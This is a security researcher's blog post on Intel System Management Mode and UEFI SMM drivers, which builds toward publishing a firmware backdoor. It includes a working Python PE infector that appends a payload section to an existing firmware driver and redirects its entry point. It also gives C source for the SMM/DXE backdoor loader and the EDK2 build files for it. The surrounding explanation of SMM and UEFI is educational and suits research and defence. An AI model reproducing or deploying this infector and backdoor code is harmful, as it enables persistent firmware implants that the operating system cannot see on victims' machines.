Mastodon

Sunday, July 5, 2015

Building reliable SMM backdoor for UEFI based platforms

System Management Mode is apparently one of the coolest dark corners of Intel IA-32 architecture. Last several months I spent with learning about SMM and coding SMM backdoor for UEFI based platforms as weekend day project, in this article I want to share the backdoor source code with you and explain how it works.

GitHub project page: https://github.com/Cr4sh/SmmBackdoor

Actually, the story started when I was inspired by recent research about SMM vulnerabilities by Intel Security ("A New Class of Vulnerabilities in SMI Handlers") and LegbaCore ("How Many Million BIOSes Would you Like to Infect?") teams and decided to audit the firmware of my Intel DQ77KB motherboard for similar vulnerabilities. For reverse engineering of SMM code you need to dump somehow a System Management Mode RAM where it lives, which is not that easy. The most obvious ways to do it — patch motherboard firmware and disable SMRAM protection to make it accessible for non-SMM code, or write exploit for some firmware vulnerability that allows to read SMRAM contents, like boot script table vulnerability (CERT VU #976132) that was described in my previous blog post about UEFI. Significant disadvantage of both these ways — they're very model specific and you may spend unpredictable amount of time porting them to some new test platform. To achieve a better solution I decided to code some firmware backdoor that runs in SMM and provides an interface that allows to dump SMRAM from less privileged code and do some other useful things. Also, later I wrote additional backdoor payload that allows to escalate privileges of user mode processes under 64-bit GNU/Linux operating system using SMM magic. Of course, this backdoor is rather research tool than malware — to install it you need to have a hardware SPI programmer and physical access to the target machine, but as was shown by other researchers — it’s also possible to weaponise such backdoor with proper UEFI exploit that allows to infect the firmware form running operating system in software only way.

SMM security is not a new theme among researchers, in last 10 years there was a lot of publications about SMM itself and it’s usage for different kind of evil purposes:
However, the most part of these research was done during legacy BIOS era and nowadays, when PC vendors had switched from legacy BIOS to UEFI, SMM security is actual like never before with it’s UEFI related aspects.

System Management Mode basics


SMM is a special execution mode of IA-32 architecture that was introduced with i386, chapter 34 of Intel 64 and IA-32 Architectures Software Developer’s Manual is the main information source about it’s design and usage:

SMM is a special-purpose operating mode provided for handling system-wide functions like power management, system hardware control, or proprietary OEM-designed code. It is intended for use only by system firmware, not by applications software or general-purpose systems software. The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.

Some time ago SMM was used by BIOS developers mostly for power management and legacy devices emulation, for example, PS/2 support (port 60h/64h) for USB keyboard and mouse. Nowadays it's also widely used for firmware and platform security purposes.

Why SMM is interesting for hackers?
  • In UEFI specification SMM plays very important role for implementing of platform security mechanisms that protects firmware image stored inside flash chip on motherboard from unauthorised modifications by malicious software.
  • SMM is excellent place to hide OS independent and invisible malware. This execution mode has extreme power over all of the other software that runs on CPU, even OS kernel or VT-x hypervisor.
SMM executable code and data lives inside SMRAM and when SMRAM is locked — it can't be accessed by code of operating system or user mode software. System firmware (legacy BIOS or UEFI) copies SMM code into SMRAM and locks it during platform initialization.

Processor is switching to SMM only trough System Management Interrupt (SMI), it saving current execution context into SMRAM and start executing SMI handler that can exit from SMM and resume execution from saved context using RSM instruction.

System Management Interrupt has the highest priority and can’t be masked. Most important facts about SMI handler execution environment:
  • Similar to 16-bit real address mode with paging disabled.
  • CS segment base is SMRAM base, EIP is 8000h.
  • Segment limits are set to 4 GBytes, you can switch to protected mode or long mode to access all of the physical memory.
  • All I/O ports are available.
  • SMM code can read or modify saved execution context.
  • SMM code can set it’s own IDT and use software interrupts.
As you can see, SMM code completely unaccessible from OS and OS can’t even notice when exactly SMI is being executed. There’s a several ways to generate SMI:
  • Ring 0 code can trigger software SMI at any time by writing some byte value to APMC I/O port B2h.
  • Internal chipset registers (SMI_EN, GEN_PMCON_1 and others) that accessible via PCI config space allows to enable or disable different kind of hardware SMI sources.
  • You can route hardware interrupts into SMM by reconfiguring of advanced programmable interrupt controller (APIC) that integrated into CPU.
  • I/O instruction restart CPU feature (chapter 34.12 of IA-32 Architectures Software Developer’s Manual) allows to generate SMI on any I/O port access by IN or OUT processor instruction.
SMRAM can be located in Compatible Memory Segment (CSEG), High Memory Segment (HSEG) or Top of Memory Segment (TSEG) system memory regions. Actually, the memory management features behind SMM and SMRAM are hardware-specific, I’m using Intel DQ77KB motherboard with Core i5-2500 CPU as test platform, so, information in this article will be provided in according to following datasheets:
CSEG is a default region of SMRAM that located at fixed address range of non-cacheable physical memory A0000h:BFFFFh (it overlaps VGA memory). CSEG was used mostly by legacy BIOS developers, modern systems can use (and actually uses) other locations of SMRAM: HSEG or TSEG. They can offer 8 MB of cacheable memory for SMM code and data which should be enough even for relatively complicated UEFI SMM Foundation core and drivers.

Here you can see physical memory map from processor datasheet:


CSEG located inside legacy address range below first MB of memory. You may notice, that there’s no HSEG area on the picture — my CPU is not supporting it. The interesting thing about TSEG — CPU stores it’s address inside internal register that not accessible by software directly, this value is calculating automatically in following way:

TSEG ADDR = TOLUD – DSM SIZE – GSM SIZE – TSEG SIZE

... where TOLUD — Top of Low Usable DRAM, DSM SIZE — size of Data of Stolen Memory, GSM SIZE — size of GTT Stolen Memory.

System Management RAM Control register (SMRAMC) controls the presence of CSEG/HSEG/TSEG regions and their accessibility from less privileged than SMM execution modes. Here’s the description of it’s bits:


System firmware sets SMRAMC value during platform initialization and locks the register — all fields becomes read-only till the next full reset. On properly configured system D_LCK must be 1 and D_OPEN must be 0, which means that SMRAM memory will be accessible only from code that runs in SMM. G_SMRAME field controls presence of CSEG and C_BASE_SEG is responsible for HSEG and TSEG. On my hardware C_BASE_SEG is read-only with predefined value 010b.

There’s also other registers that should be properly configured and locked by firmware to protect SMRAM from various attacks:
  • Top of Upper Usable DRAM (TOUUD), Top of Low Usable DRAM (TOLUD), REMAPLIMIT and REMAPBASE registers that used to configure physical memory map must be locked by firmware to protect SMRAM from memory remapping attacks. For more information check "System Management Mode Design and Security Issues" and "Preventing and Detecting Xen Hypervisor Subversions" white papers.
  • TSEGMB register defines address of memory region that should be protected from DMA access, firmware must configure and lock it. For more information check "Attacking UEFI Boot Script" white paper.
  • System Management Range Registers (SMRR) — a pair of IA32_SMRR_PHYSBASE and IA32_SMRR_PHYSMASK MSR registers that can be modified only by SMM code. Because HSEG and TSEG memory is cacheable — SMRR must be configured to protect it from SMM cache poisoning attacks. For more information check "Attacking SMM Memory via Intel CPU Cache Poisoning" white paper.

UEFI SMM foundation


Unified Extensible Firmware Interface (UEFI) is a standard firmware architecture for PC that used in most of the modern computers and notebooks available at the market. UEFI provides a lot of abstractions over architectural mechanisms of SMM that was described above. For more information about UEFI design please refer to UEFI Platform Initialization Specification.

UEFI boot sequence consists from several platform initialization (PI) phases, each PI phase has it’s own execution environment and API:


PEI phase was described in my previous article about UEFI boot script table vulnerability, S3 resume boot path that was mentioned in that article is not shown on picture above.

DXE phase begins when PEI core transfers execution to DxeMain() function of DXE core module that stored on Firmware File System (FFS) image inside ROM chip on motherboard. DXE core loads other DXE drivers from FFS, these drivers can use EFI boot services (described by EFI_BOOT_SERVICES structure) and EFI runtime services (described by EFI_RUNTIME_SERVICES structure). This phase is a quite similar to PEI: loaded DXE drivers can register new UEFI protocol interfaces using EFI_BOOT_SERVICES.RegisterProtoclInterface() function, get notifications about some protocol registration using EFI_BOOT_SERVICES.RegisterProtoclNotify() or lookup existing protocols using EFI_BOOT_SERVICES.LocateProtocol() and EFI_BOOT_SERVICES.LocateHandle(). DXE phase ends when EFI OS loader calls EFI_BOOT_SERVICES.ExitBootServices() function that transfers execution to operating system kernel. During runtime phase only functions of EFI_RUNTIME_SERVICES are available for running OS.

SMM phase is optional phase that starts in DXE and runs in parallel with other PI phases into runtime. Volume 4 of Platform Initialization Specification — System Management Mode Core Interface, told us that SMM phase consists from two parts:
  • SMRAM initialization — during DXE, an SMM related driver opens SMRAM, creates the SMRAM memory map and provides the necessary services to launch SMM-related drivers and then, before boot, close and lock SMRAM.
  • SMI management — when an SMI generated, the driver execution environment is created and then the SMI sources are detected and SMI handlers called.
EFI Development Kit II source code has open source implementation of SMM protocols but the code isn't complete because these protocols are hardware specific, to get more useful implementation you may have a look at the Intel Quark Board Support Package. Please note, that Quark BSP supports only i386 architecture (Intel Quark SoC has no long mode support) while UEFI firmware of most of the PC's uses x86_64 code for SMM. Also, "EDK II SMM call topology" document provides an excellent walkthrough for these open source projects.

SMM phase is starts with cooperation of several DXE drivers that should implement the following UEFI protocols:
  • EFI_SMM_ACCESS2_PROTOCOL — describes the different SMRAM regions available in the system.
  • EFI_SMM_CONTROL2_PROTOCOL — used to initiate synchronous SMI activations.
  • EFI_SMM_BASE2_PROTOCOL — used to locate the System Management Services Table (SMST) during SMM driver initialization.
  • EFI_SMM_CONFIGURATION_PROTOCOL — mandatory protocol published by a DXE CPU driver to indicate which areas within SMRAM are reserved for use by the CPU for any purpose, such as stack, save state or SMM entry point.
  • EFI_SMM_COMMUNICATION_PROTOCOL — provides a means of communicating between drivers outside of SMM and SMI handlers inside of SMM.
  • EFI_DXE_SMM_READY_TO_LOCK_PROTOCOL — mandatory protocol published by a DXE driver to indicate that SMM is about to be locked. Registration notify of this protocol is usually invoking the EFI_SMM_ACCESS2_PROTOCOL.Lock() function to lock SMRAM.
EFI_SMM_ACCESS2_PROTOCOL, EFI_SMM_CONTROL2_PROTOCOL and EFI_SMM_BASE2_PROTOCOL are presents starting from 1.0 version of Platform Initialization Specification, they replaces EFI_SMM_ACCESS_PROTOCOL, EFI_SMM_CONTROL_PROTOCOL and EFI_SMM_BASE_PROTOCOL from previous versions of specification. Nowadays the most of BIOS vendors uses new protocols, but some old hardware may support only old, which means that reliable SMM backdoor for real life purposes should be able to work with the both of these protocols sets.

There’s a three types of DXE phase drivers involved in SMM initialization:
  • DXE drivers — regular DXE phase drivers that loads into system memory by DXE core driver.
  • SMM drivers — SMM Drivers are launched once, directly into SMRAM during SMM phase initialization.
  • SMM/DXE combined drivers — Combination of drivers that loaded twice: as DXE driver and as SMM driver.
All these drivers has a same signature of the entry point function:
typedef
EFI_STATUS
(EFIAPI * EFI_IMAGE_ENTRY_POINT) (
    IN EFI_HANDLE ImageHandle,
    IN EFI_SYSTEM_TABLE *SystemTable
);

SMM and SMM/DXE combined drivers can use EFI_BOOT_SERVICES functions and DXE protocols only at entry point, protocols and callbacks that being invoked during SMI management should use only SMST functions and SMM protocols.

Here is SMM system table structure from EDK2 source with some of my additional comments:
//
// System Management System Table (SMST)
//
// The System Management System Table (SMST) is a table that contains a collection of common 
// services for managing SMRAM allocation and providing basic I/O services. These services are 
// intended for both preboot and runtime usage.
//
struct _EFI_SMM_SYSTEM_TABLE2 
{
    // The table header for the SMST.
    EFI_TABLE_HEADER Hdr;

    // A pointer to a NULL-terminated Unicode string containing the vendor name.
    // It is permissible for this pointer to be NULL.
    CHAR16 *SmmFirmwareVendor;
    
    // The particular revision of the firmware.
    UINT32 SmmFirmwareRevision;

    // Adds, updates, or removes a configuration table entry from the SMST.
    EFI_SMM_INSTALL_CONFIGURATION_TABLE2 SmmInstallConfigurationTable; 

    // I/O Service
    EFI_SMM_CPU_IO2_PROTOCOL SmmIo;

    //
    // Runtime memory services                               
    //

    // Allocates pool memory from SMRAM.
    EFI_ALLOCATE_POOL SmmAllocatePool;

    // Returns SMRAM pool memory to system.
    EFI_FREE_POOL SmmFreePool;
 
    // Allocates page memory from SMRAM.
    EFI_ALLOCATE_PAGES SmmAllocatePages;

    // Returns pages of memory to the system.
    EFI_FREE_PAGES SmmFreePages;

    // Execute caller-provided code stream on one distinct application processor while in SMM.
    EFI_SMM_STARTUP_THIS_AP SmmStartupThisAp;
                                                              
    //
    // CPU information records
    //

    // A number between zero and and the NumberOfCpus field. This field designates 
    // which processor is executing the SMM infrastructure.
    UINTN CurrentlyExecutingCpu;
    
    // The number of possible processors in the platform.  This is a 1 based counter.
    UINTN NumberOfCpus;
    
    // Points to an array, where each element describes the number of bytes in the 
    // corresponding save state specified by CpuSaveState. There are always 
    // NumberOfCpus entries in the array. 
    UINTN *CpuSaveStateSize;
    
    // Points to an array, where each element is a pointer to a CPU save state. The 
    // corresponding element in CpuSaveStateSize specifies the number of bytes in the 
    // save state area. There are always NumberOfCpus entries in the array.
    VOID **CpuSaveState;      

    //
    // Extensibility table
    //

    // The number of UEFI Configuration Tables in the buffer SmmConfigurationTable.
    UINTN NumberOfTableEntries;
    
    // A pointer to the UEFI Configuration Tables. The number of entries in the table is 
    // NumberOfTableEntries. 
    EFI_CONFIGURATION_TABLE *SmmConfigurationTable;

    //
    // Protocol services
    //

    // Installs a SMM protocol interface.
    EFI_INSTALL_PROTOCOL_INTERFACE SmmInstallProtocolInterface;

    // Removes a SMM protocol interface.
    EFI_UNINSTALL_PROTOCOL_INTERFACE SmmUninstallProtocolInterface;

    // Queries a handle to determine if it supports a specified SMM protocol.
    EFI_HANDLE_PROTOCOL SmmHandleProtocol;
                                                                          
    // Register a callback function be called when a particular protocol interface is installed.
    EFI_SMM_REGISTER_PROTOCOL_NOTIFY SmmRegisterProtocolNotify;

    // Returns an array of handles that support a specified protocol.
    EFI_LOCATE_HANDLE SmmLocateHandle;

    // Returns the first SMM protocol instance that matches the given protocol.
    EFI_LOCATE_PROTOCOL SmmLocateProtocol;

    //
    // SMI Management functions
    //

    // Manage SMI of a particular type.
    EFI_SMM_INTERRUPT_MANAGE SmiManage;
 
    // Registers a handler to execute within SMM.
    EFI_SMM_INTERRUPT_REGISTER SmiHandlerRegister;
 
    // Unregister a handler in SMM.
    EFI_SMM_INTERRUPT_UNREGISTER SmiHandlerUnRegister;
};

In addition to previously described protocols for DXE phase, SMM drivers also can use the following SMM-only protocols during SMI management:
  • EFI_SMM_STATUS_CODE_PROTOCOL — reports SMM code errors to other UEFI PI components.
  • EFI_SMM_CPU_PROTOCOL — provides access to saved CPU execution state.
  • EFI_SMM_CPU_IO2_PROTOCOL — provides CPU I/O and memory access for SMM code.
  • EFI_SMM_PCI_ROOT_BRIDGE_IO_PROTOCOL — provides the basic memory, I/O, PCI configuration, and DMA interfaces that are used to abstract accesses to PCI controllers behind a PCI root bridge controller.
  • EFI_SMM_READY_TO_LOCK_SMM_PROTOCOL — mandatory protocol published by the SMM Foundation to indicate that SMRAM is about to be locked.
  • EFI_SMM_END_OF_DXE_PROTOCOL — similar to EFI_SMM_READY_TO_LOCK_SMM_PROTOCOL, published by the PI platform code prior to invoking any 3rd party content, including options ROM’s and UEFI executables that are not from the platform manufacturer.

Writing SMM/DXE combined drivers


SMM/DXE combined drivers looks very neat for evil purposes: you can have a single backdoor with ability to execute the both of DXE and SMM phase payloads.

I expected a difficulties with finding of usable example of such drivers in public sources like EDK2, Quark BSP or others. Actually, there's only two publicly available articles about UEFI SMM drivers development: "EFI Howto, Write a SMM Driver" and "BIOS Undercover: Writing A Software SMI Handler" — both of them are outdated, incomplete or vendor-specific.

To learn how to write combined drivers I decided to make a short reverse engineering of existing combined driver from my motherboard’s firmware. This time I used UEFITool by Nikolaj Schlej to work with flash image, if you need to do firmware modification and rebuild — this excellent tool works much more better than uefi-firmware-parser that was mentioned in my previous article.

As my target I took combined driver named 26A2481E-4424-46A2-9943-CC4039EAD8F8 (Google tells that this GUID belongs to S3Save UEFI driver but for our purposes it's doesn’t matter):


After extracting of driver’s body let’s load it into the IDA Pro and observe a code around module entry point. PEI modules reverse engineering tips and tricks from previous article are applicable to DXE and SMM drivers as well, there’s only one major difference — DXE and SMM phase code uses x86_64 architecture instead of i386 for PEI.
DWORD __stdcall EntryPoint(PVOID ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    EFI_SYSTEM_TABLE *v2; // rbx@1
    PVOID v3; // rdi@1

    v2 = SystemTable;
    v3 = ImageHandle;

    // initialize global variables for image handle and system tables
    sub_180002074(ImageHandle, SystemTable);

    // do the stuff
    return sub_180001FD0(v3, v2);
}

EFI_RUNTIME_SERVICES * __fastcall sub_180002074(PVOID ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    EFI_RUNTIME_SERVICES *v2; // rax@2

    if (!gST)
    {
        gST = SystemTable;
        gBS = SystemTable->BootServices;
        v2 = SystemTable->RuntimeServices;
        gImageHandle = ImageHandle;
        gRuntimeServices = v2;
    }

    return v2;
}

DWORD __fastcall sub_180001FD0(PVOID ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
    EFI_SYSTEM_TABLE *v2; // rbx@1
    PVOID v3; // rdi@1
    __int64 v4; // rax@1
    char v6; // [sp+38h] [bp+10h]@1

    v2 = SystemTable;
    v3 = ImageHandle;
    bInSmm = 0;

    // perform various initializations
    sub_180002074(ImageHandle, SystemTable);

    // locate EFI_SMM_BASE2_PROTOCOL
    LODWORD(v4) = v2->BootServices->LocateProtocol(
        &gEfiSmmBase2ProtocolGuid,
        0i64,
        &gEfiSmmBase2Protocol
    );
    if (v4 & 0x8000000000000000)
    {
        if (v4 != 0x800000000000000E)
        {
            return 3;
        }

        bInSmm = 0;

        // EFI_SMM_BASE2_PROTOCOL was not found, do the DXE stuff
        return sub_180001F54(v3, v2);
    }

    gEfiSmmBase2Protocol->InSmm(gEfiSmmBase2Protocol, &bInSmm);
    if (!bInSmm)
    {
        // EFI_SMM_BASE2_PROTOCOL found but we are not in SMM, do the DXE stuff
        return sub_180001F54(v3, v2);
    }

    // driver loaded into SMRAM, do the SMM stuff
    return sub_180001ED8(v3, v2);
}

int __fastcall sub_180001ED8(void *a1, EFI_SYSTEM_TABLE *a2)
{
    __int64 v2; // rax@1
    __int64 v3; // rax@3

    // perform various SMM initializations
    LODWORD(v2) = sub_1800021D8(a1, a2);

    if (!(v2 & 0x8000000000000000))
    {
        LODWORD(v2) = sub_180000610(1);

        if (!(v2 & 0x8000000000000000))
        {
            // get location of System Management Service Table
            LODWORD(v3) = gEfiSmmBase2Protocol->GetSmstLocation(
                gEfiSmmBase2Protocol,
                &gSMST
            );
            if (v3 & 0x8000000000000000 || !gSMST)
            {
                // error: unable to locate SMST
                LODWORD(v2) = 3;
            }
            else
            {
                // do the rest of SMM stuff
                // ...
            }
        }
    }

    return v2;
}

As you can see, entry point of this module calls sub_180002074() function that initializes global variables, sub_180001FD0() is using EFI_SMM_BASE2_PROTOCOL.InSmm() to determinate that driver runs in SMM mode and if yes — it locates SMST with EFI_SMM_BASE2_PROTOCOL.GetSmstLocation() and continues to do various SMM related stuff. When driver was loaded as DXE — sub_180001F54() is being called to perform DXE related operations and sub_180001ED8() is used when driver was loaded in SMM.

Running your code in SMM


As it was said, to run some custom code in SMM you need to have a hardware programmer, if your board has a COM port — it might be very useful for reading the debug output of SMM code.

On the picture you can see my test setup that was mentioned in previous article:


When it was clear how SMM/DXE combined driver should work — I wrote a simple hello world driver that uses EFI_SMM_BASE2_PROTOCOL to locate SMST and print it’s address to debug output. First I decided to add driver’s image to FFS volume as a new file, but when I flashed my test system with updated firmware image — hello world driver wasn’t loaded. I still don’t know the exact reason of such behaviour: probably, there was something wrong with PE/FFS headers or driver load order dependencies. Well, but there’s at least one good thing: modified firmware is functioning fine, which means that Intel DQ77KB board is not using any custom mechanisms to verify firmware image or FFS volumes integrity.

The next attempt that I decided to try to don’t waste a time on reverse engineering and debugging — infect PE image of existing combined driver that was featured above.

Using Python and pefile library I wrote a trivial PE files infector that copies payload PE image to a new section of the target image and hooks it’s entry point to execute payload on image load:
# see struct _INFECTOR_CONFIG in SmmBackdoor.h
INFECTOR_CONFIG_SECTION = '.conf'
INFECTOR_CONFIG_FMT = 'QI'
INFECTOR_CONFIG_LEN = 8 + 4

# IMAGE_DOS_HEADER.e_res magic constant to mark infected file
INFECTOR_SIGN = 'INFECTED'

# infect src image with payload and optionally save it to dst
def infect(src, payload, dst = None):

    import pefile

    def _infector_config_offset(pe):
        
        for section in pe.sections:

            # find .conf section of payload image
            if section.Name[: len(INFECTOR_CONFIG_SECTION)] == INFECTOR_CONFIG_SECTION:

                return section.PointerToRawData

        raise Exception('Unable to find %s section' % INFECTOR_CONFIG_SECTION)

    def _infector_config_get(pe, data):

        offs = _infector_config_offset(pe)
        
        return unpack(INFECTOR_CONFIG_FMT, data[offs : offs + INFECTOR_CONFIG_LEN])        

    def _infector_config_set(pe, data, *args):

        offs = _infector_config_offset(pe)

        return data[: offs] + \
               pack(INFECTOR_CONFIG_FMT, *args) + \
               data[offs + INFECTOR_CONFIG_LEN :]

    # load target image
    pe_src = pefile.PE(src)

    # load payload image
    pe_payload = pefile.PE(payload)
    
    if pe_src.DOS_HEADER.e_res == INFECTOR_SIGN:

        raise Exception('%s is already infected' % src)        

    if pe_src.FILE_HEADER.Machine != pe_payload.FILE_HEADER.Machine:

        raise Exception('Architecture missmatch')

    # read payload image data into the string
    data = open(payload, 'rb').read()

    # read _INFECTOR_CONFIG, this structure is located at .conf section of payload image
    conf_ep_new, conf_ep_old = _infector_config_get(pe_payload, data)    

    last_section = None
    for section in pe_src.sections:

        # find last section of target image
        last_section = section

    if last_section.Misc_VirtualSize > last_section.SizeOfRawData:

        raise Exception('Last section virtual size must be less or equal than raw size')

    # save original entry point address of target image
    conf_ep_old = pe_src.OPTIONAL_HEADER.AddressOfEntryPoint

    # write updated _INFECTOR_CONFIG back to the payload image
    data = _infector_config_set(pe_payload, data, conf_ep_new, conf_ep_old)

    # set new entry point of target image
    pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
        last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new

    # update last section size
    last_section.SizeOfRawData += len(data)
    last_section.Misc_VirtualSize = last_section.SizeOfRawData

    # make it executable
    last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']

    # update image headers
    pe_src.DOS_HEADER.e_res = INFECTOR_SIGN
    pe_src.OPTIONAL_HEADER.SizeOfImage = \
        last_section.VirtualAddress + last_section.Misc_VirtualSize

    # get infected image data
    data = pe_src.write() + data

    if dst is not None:

        with open(dst, 'wb') as fd:

            # save infected image to the file
            fd.write(data)

    return data

As was said, infector payload is just a regular PE image of DXE/SMM combined driver. After load this image updates it’s base relocations, performs backdoor initialization operations and transfers execution to original entry point of infected image (it’s RVA address was saved by infector in .conf section of payload image).
// file: SmmBackdoor.c

// UEFI SMM foundation headers
#include <FrameworkSmm.h>

// required EDK protocols
#include <Protocol/LoadedImage.h>
#include <Protocol/SmmCpu.h>
#include <Protocol/SmmBase2.h>
#include <Protocol/SmmAccess2.h>
#include <Protocol/SmmSwDispatch2.h>
#include <Protocol/SmmPeriodicTimerDispatch2.h>
#include <Protocol/DevicePath.h>
#include <Protocol/SerialIo.h>

// required EDK libraries
#include <Library/UefiDriverEntryPoint.h>
#include <Library/UefiBootServicesTableLib.h>
#include <Library/DebugLib.h>
#include <Library/DevicePathLib.h>
#include <Library/UefiRuntimeLib.h>
#include <Library/SynchronizationLib.h>

// PE image structures
#include <IndustryStandard/PeImage.h>

#include "config.h"
#include "common.h"
#include "printf.h"
#include "debug.h"
#include "loader.h"
#include "SmmBackdoor.h"

#include "asm/common_asm.h"

// this function will be used as entry point of infected image
EFI_STATUS
BackdoorEntryInfected(
    EFI_HANDLE ImageHandle,
    EFI_SYSTEM_TABLE *SystemTable
);

#pragma section(".conf", read, write)

// PE image section with information for infector
__declspec(allocate(".conf")) INFECTOR_CONFIG m_InfectorConfig = 
{ 
    // new entry point address of infected file
    (PVOID)&BackdoorEntryInfected,

    // old entry point address (will be set by infector)
    0
};

// DXE and runtime phase API
EFI_SYSTEM_TABLE *gST;
EFI_BOOT_SERVICES *gBS;
EFI_RUNTIME_SERVICES *gRT;

// SMM phase API
EFI_SMM_SYSTEM_TABLE2 *gSmst = NULL;

BOOLEAN m_bInfectedImage = FALSE;
EFI_HANDLE m_ImageHandle = NULL;
PVOID m_ImageBase = NULL;
//--------------------------------------------------------------------------------------
PVOID BackdoorImageAddress(void)
{
    PVOID Addr = _get_addr();
    UINT64 Base = ALIGN_DOWN((UINT64)Addr, DEFAULT_EDK_ALIGN);

    // get current module base address by some address inside it
    while (*(PUSHORT)Base != EFI_IMAGE_DOS_SIGNATURE)
    {
        Base -= DEFAULT_EDK_ALIGN;
    }

    return Base;
}
//--------------------------------------------------------------------------------------
EFI_STATUS BackdoorImageCallRealEntry(
    PVOID Image,
    EFI_HANDLE ImageHandle,
    EFI_SYSTEM_TABLE *SystemTable)
{
    if (m_InfectorConfig.OriginalEntryPoint != 0)
    {
        EFI_IMAGE_ENTRY_POINT pEntry = (EFI_IMAGE_ENTRY_POINT)RVATOVA(
            Image, 
            m_InfectorConfig.OriginalEntryPoint
        );

        // call original entry point
        return pEntry(ImageHandle, SystemTable);
    }

    return EFI_SUCCESS;
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntryDxe(VOID)
{
    // DXE phase payload code goes here
    // ...
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    // SMM phase payload code goes here
    // ...
}
//--------------------------------------------------------------------------------------
EFI_STATUS
BackdoorEntryInfected(
    EFI_HANDLE ImageHandle,
    EFI_SYSTEM_TABLE *SystemTable)
{
    // get payload image address
    PVOID Base = BackdoorImageAddress();

    // update payload image base relocations
    LdrProcessRelocs(Base, Base);

    // after LdrProcessRelocs() call we can use global variables and data
    m_ImageBase = Base;

    // call original entry point of payload image
    return BackdoorEntry(
        ImageHandle,
        SystemTable
    );
}
//--------------------------------------------------------------------------------------
EFI_STATUS 
BackdoorEntry(
    IN EFI_HANDLE ImageHandle,
    IN EFI_SYSTEM_TABLE *SystemTable) 
{
    EFI_STATUS Ret = EFI_SUCCESS, Status = EFI_SUCCESS;
    BOOLEAN bInSmram = FALSE;
    PVOID Image = NULL;            

    EFI_LOADED_IMAGE *LoadedImage = NULL;   
    EFI_SMM_BASE2_PROTOCOL *SmmBase = NULL;    

    if (m_ImageHandle == NULL)
    {
        m_ImageHandle = ImageHandle;    

        gST = SystemTable;
        gBS = gST->BootServices;
        gRT = gST->RuntimeServices;           

        DbgMsg(__FILE__, __LINE__, "BackdoorEntry() called\r\n");

        // get current image information
        gBS->HandleProtocol(ImageHandle, &gEfiLoadedImageProtocolGuid, (VOID *)&LoadedImage);    
        
        if (m_ImageBase == NULL)
        {
            // payload image was loaded as standalone EFI application or driver
            m_bInfectedImage = FALSE;
            m_ImageBase = LoadedImage->ImageBase;

            DbgMsg(__FILE__, __LINE__, "Started as standalone driver/app\r\n");
        }
        else
        {
            // payload image was loaded as infector payload
            m_bInfectedImage = TRUE;

            DbgMsg(__FILE__, __LINE__, "Started as infector payload\r\n");
        }

        DbgMsg(__FILE__, __LINE__, "Image base address is "FPTR"\r\n", m_ImageBase);    
    }     

    Status = gBS->LocateProtocol(&gEfiSmmBase2ProtocolGuid, NULL, (PVOID *)&SmmBase);
    if (Status == EFI_SUCCESS)
    {
        // check if infected driver is running in SMM
        SmmBase->InSmm(SmmBase, &bInSmram);

        if (bInSmram)
        {
            DbgMsg(__FILE__, __LINE__, "Running in SMM\r\n");

            Status = SmmBase->GetSmstLocation(SmmBase, &gSmst);
            if (Status == EFI_SUCCESS)
            {
                DbgMsg(__FILE__, __LINE__, "SMM system table is at "FPTR"\r\n", gSmst);

                // run SMM specific code
                BackdoorEntrySmm();
            }   
            else
            {
                DbgMsg(__FILE__, __LINE__, "GetSmstLocation() fails: 0x%X\r\n", Status);
            }
        }                
    }

    if (!bInSmram)
    {
        // run DXE specific code
        BackdoorEntryDxe();
    }

    if (m_bInfectedImage)
    {
        // call original entry point of infected image
        Ret = BackdoorImageCallRealEntry(LoadedImage->ImageBase, ImageHandle, SystemTable);
    }    

    return Ret;
}
//--------------------------------------------------------------------------------------
// EoF

To compile UEFI drivers I’m using previously mentioned EDK2. Unfortunately, on my OS X machine it fails to build with compilation errors, so, I will compile SMM backdoor driver on Windows machine with Visual Studio 2008 installed.

First of all, we need to clone EDK2 source code tree from https://github.com/tianocore/edk2 and read build instructions in BuildNotes2.txt document. Then we need to edit Conf/target.txt file and set ACTIVE_PLATFORM property value to OvmfPkg/OvmfPkgX64.dsc, directory with the backdoor driver source code (SmmBackdoor) should be copied to directory with EDK2 source.

EDK2 uses it’s own makefile format, for our project we need to have SmmBackdoor/SmmBackdoor.inf file with the following content:
# main settings
[defines]
  INF_VERSION = 0x00010005 
  BASE_NAME = SmmBackdoor
  FILE_GUID = 22D5AE41-147E-4C44-AE72-ECD9BBB455C1 # random one
  MODULE_TYPE = DXE_SMM_DRIVER
  ENTRY_POINT = BackdoorEntry

# C sources
[Sources]
  debug.c
  loader.c
  printf.c
  serial.c
  SmmBackdoor.c

# architecture-specific assembly sources
[Sources.X64]
  asm/amd64/common_asm.asm

# required EDK packages
[Packages]
  MdePkg/MdePkg.dec
  MdeModulePkg/MdeModulePkg.dec
  IntelFrameworkPkg/IntelFrameworkPkg.dec  
  IntelFrameworkModulePkg/IntelFrameworkModulePkg.dec  
  StdLib/StdLib.dec

# required EDK libraries
[LibraryClasses]
  UefiDriverEntryPoint
  UefiBootServicesTableLib
  DebugLib
  DevicePathLib
  SynchronizationLib

# required EDK protocols
[Protocols]
  gEfiSimpleTextOutProtocolGuid
  gEfiLoadedImageProtocolGuid
  gEfiSmmCpuProtocolGuid
  gEfiSmmBase2ProtocolGuid
  gEfiSmmAccess2ProtocolGuid
  gEfiSmmSwDispatch2ProtocolGuid
  gEfiSmmPeriodicTimerDispatch2ProtocolGuid
  gEfiDevicePathProtocolGuid
  gEfiSerialIoProtocolGuid  
 
# load order dependencies (none)
[Depex]
  TRUE

Also, you need to edit OvmfPkg/OvmfPkgX64.dsc and add the following lines at the end of the file:
  #
  # 3-rd party drivers
  #
  SmmBackdoor/SmmBackdoor.inf {
    <LibraryClasses>
      DebugLib|OvmfPkg/Library/PlatformDebugLibIoPort/PlatformDebugLibIoPort.inf
      MemoryAllocationLib|MdePkg/Library/UefiMemoryAllocationLib/UefiMemoryAllocationLib.inf
  }

